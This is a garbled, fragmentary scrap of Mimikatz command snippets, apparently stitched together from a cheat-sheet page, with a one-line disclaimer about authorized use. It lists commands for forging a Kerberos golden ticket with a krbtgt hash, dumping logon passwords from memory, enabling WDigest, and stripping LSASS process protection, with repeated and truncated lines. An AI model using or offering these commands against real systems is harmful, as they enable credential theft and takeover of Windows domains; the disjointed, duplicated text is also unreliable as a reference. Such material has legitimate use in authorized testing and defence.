kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /id:500 /ptt
privilege::debug sekurlsa::wdigest # Reboot required after registry change mimikatz commands
!+ !processprotect /process:lsass.exe /unprotect kerberos::golden /user:Administrator /domain:contoso
For more detailed information and usage examples, you can refer to the official Mimikatz documentation . mimikatz commands
Mimikatz is intended for authorized security testing, incident response, and forensic analysis only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.
sekurlsa::logonpasswords